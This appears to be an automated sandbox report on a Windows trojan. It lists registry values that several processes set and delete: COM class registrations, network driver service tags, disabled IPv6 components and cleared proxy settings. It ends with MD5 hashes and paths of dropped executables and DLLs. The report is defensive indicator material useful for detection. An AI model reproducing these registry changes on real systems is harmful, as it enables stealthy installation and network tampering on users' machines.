[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe:3268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "2C 3C 44 64 9A 83 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 48 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process amisetup2899__9664.exe:3368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1430290658"

[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"(Default)" = "{1CEE7E9E-B36C-4404-8341-EACC6687DA52}"

[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionTime" = "33 5F AA 66 9A 83 D0 01"

[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"(Default)" = "{1CEE7E9E-B36C-4404-8341-EACC6687DA52}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\Version]
"(Default)" = "1.0"

[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0]
"(Default)" = "InstallerLib"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "2C 3C 44 64 9A 83 D0 01"

[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}]
"(Default)" = "Inst Class"

[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\ProgID]
"(Default)" = "scalawag.wuther.1"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "amisetup2899__9664.exe"

[HKCR\scalawag.wuther\CurVer]
"(Default)" = "scalawag.wuther.1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe"

[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp"

[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\TypeLib]
"(Default)" = "{1cee7e9e-b36c-4404-8341-eacc6687da52}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 49 00 00 00 09 00 00 00 00 00 00 00"

[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
"(Default)" = "IBoot"

[HKCR\scalawag.wuther.1\CLSID]
"(Default)" = "{c8c02f46-c416-4092-a52c-abb5232cb4b9}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKCR\scalawag.wuther]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"

[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
"(Default)" = "IBoot"

[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\VersionIndependentProgID]
"(Default)" = "scalawag.wuther"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"Version" = "1.0"

[HKCR\scalawag.wuther.1]
"(Default)" = "Inst Class"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\Version]
[HKCR\scalawag.wuther\CurVer]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\VersionIndependentProgID]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\FLAGS]
[HKCR\scalawag.wuther.1\CLSID]
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\0]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}]
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\0\win32]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\Programmable]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\TypeLib]
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
[HKCR\scalawag.wuther.1]
[HKCR\scalawag.wuther]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\HELPDIR]
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\ProgID]

The Trojan deletes the following value(s) in system registry:

[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
"ServerExecutable"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process GOSafer.exe:3284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKLM\System\CurrentControlSet\Services\gosaferdrv]
"Tag" = "17"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 06 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "21 B7 48 6B 9A 83 D0 01"

[HKLM\SOFTWARE\GOSafer]
"instid" = "OuKz1Yi6BxlXdCQ8IZpYGGBgz2TyMvRv"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "10 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

The process WNet.exe:3080 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\ssfilterdrv]
"Tag" = "13"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "22 FE 3B 6A 9A 83 D0 01"

[HKLM\SOFTWARE\WNet]
"instid" = "XjbAXMdlReRSpd1DDxs3QmrHlGV9Q488"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0C 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

The process 310714_is.exe:948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "25 CC 85 1E BF 72 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer]
"GlobalAssocChangedCounter" = "35"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 45 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

MD5 File path
cd594b7e64bbb60804076c1434a1ec09 c:\Program Files (x86)\ActSys\ActSys.exe
d6f19bc6d4f54dfae1a4d4b96d12f1c1 c:\Program Files (x86)\ActSys\ProtocolFilters.dll
bec584303ce252396a3731ce5bdcf03a c:\Program Files (x86)\ActSys\libeay32.dll
d8305b5c2810e2e135f87bb32d62810e c:\Program Files (x86)\ActSys\nfapi.dll
01b5780505301ada6dc102fb77b2298c c:\Program Files (x86)\ActSys\nfregdrv.exe
f40cddc932f47b3e406d0c4fde03dfd8 c:\Program Files (x86)\ActSys\remove_ActSys.exe
da6f5524c9e5b5804dc5117022d08331 c:\Program Files (x86)\ActSys\ssleay32.dll
84887ac0f5fde399c83b3bc5a7aaf097 c:\Program Files (x86)\CashReminder\CashReminder.exe
d68a76ab1ebbbdde37bb12bd68b1639d c:\Program Files (x86)\CashReminder\ProtocolFilters.dll
bec584303ce252396a3731ce5bdcf03a c:\Program Files (x86)\CashReminder\libeay32.dll
d8305b5c2810e2e135f87bb32d62810e c:\Program Files (x86)\CashReminder\nfapi.dll
01b5780505301ada6dc102fb77b2298c c:\Program Files (x86)\CashReminder\nfregdrv.exe
da6f5524c9e5b5804dc5117022d08331 c:\Program Files (x86)\CashReminder\ssleay32.dll
f2f4090a44f85db92f9ec40483c7e502 c:\Program Files (x86)\CashReminder\uninstall.exe
45c9d00b83bcafd991f95eeac6097b7f c:\Program Files (x86)\DesProtetor\DesProtetor.exe
9a0c59099f8589ee0f026bcd42c06800 c:\Program Files (x86)\DesProtetor\ProtocolFilters.dll
3e1176c39139baf084e9a69d6d50438a c:\Program Files (x86)\DesProtetor\libeay32.dll
0e2ca4f2d3f113f006d5801319a626de c:\Program Files (x86)\DesProtetor\nfapi.dll
92a6df47283b49b207045fa7a4502bc1 c:\Program Files (x86)\DesProtetor\nfregdrv.exe
4fbf0e0dd471ce2945c33c14e14269ff c:\Program Files (x86)\DesProtetor\ssleay32.dll
28ca54fa79bb30e8eef8ebd5053ee746 c:\Program Files (x86)\DesProtetor\uninst.exe
9a0c59099f8589ee0f026bcd42c06800 c:\Program Files (x86)\GOSafer\ProtocolFilters.dll
c1908176b417b29dcfcfc15d7de9de63 c:\Program Files (x86)\GOSafer\gosafer.exe
3e1176c39139baf084e9a69d6d50438a c:\Program Files (x86)\GOSafer\libeay32.dll
0e2ca4f2d3f113f006d5801319a626de c:\Program Files (x86)\GOSafer\nfapi.dll
92a6df47283b49b207045fa7a4502bc1 c:\Program Files (x86)\GOSafer\nfregdrv.exe
4fbf0e0dd471ce2945c33c14e14269ff c:\Program Files (x86)\GOSafer\ssleay32.dll
9d37509b72dc3143feffc3f1977c9d7d c:\Program Files (x86)\GOSafer\uninst.exe
9a0c59099f8589ee0f026bcd42c06800 c:\Program Files (x86)\WNet\ProtocolFilters.dll
45571677457a9bfd49aadada0fd91ca8 c:\Program Files (x86)\WNet\WNet.exe
3e1176c39139baf084e9a69d6d50438a c:\Program Files (x86)\WNet\libeay32.dll
8249371485714e1f45a4b1c67002cf47 c:\Program Files (x86)\WNet\nfapi.dll
92a6df47283b49b207045fa7a4502bc1 c:\Program Files (x86)\WNet\nfregdrv.exe
4fbf0e0dd471ce2945c33c14e14269ff c:\Program Files (x86)\WNet\ssleay32.dll
6200d767a099a1744e99abae47958a42 c:\Program Files (x86)\WNet\uninst.exe
0183c88583bbf1c99d67acce017c9beb c:\Program Files (x86)\XTab\BrowerWatchCH.dll
fd0b82d24d162e240931cfd5540d3021 c:\Program Files (x86)\XTab\BrowerWatchFF.dll
5785680870eff9ba7b4f58c726552013 c:\Program Files (x86)\XTab\BrowserAction.dll
b124f96efd0010e4f7e262f08519e9e4 c:\Program Files (x86)\XTab\CmdShell.exe
77ccf1c943665ececf9a5ce699560500 c:\Program Files (x86)\XTab\HPNotify.exe
4a345a11cc64ab72cb09ff391611dad0 c:\Program Files (x86)\XTab\IeWatchDog.dll
cc709fa63d5a536a2f8275c0cea39070 c:\Program Files (x86)\XTab\ProtectService.exe
efa257c845943b84922117758c955434 c:\Program Files (x86)\XTab\SupTab.dll
3e29914113ec4b968ba5eb1f6d194a0a c:\Program Files (x86)\XTab\msvcp110.dll
4ba25d2cbe1587a841dcfb8c8c4a6ea6 c:\Program Files (x86)\XTab\msvcr110.dll
e29708f3781e5790424ca59a0fbb1bd3 c:\Program Files (x86)\XTab\uninstall.exe
8a8f5ebe2fd9c2e6325723209b9cdf32 c:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe
8a8f5ebe2fd9c2e6325723209b9cdf32 c:\Users\All Users\WindowsMangerProtect\ProtectWindowsManager.exe
d61776c4928db339475ab6a773585c9d c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_am2[1].exe
c5e3b60827475c15298f27df5aa241db c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_cr[1]
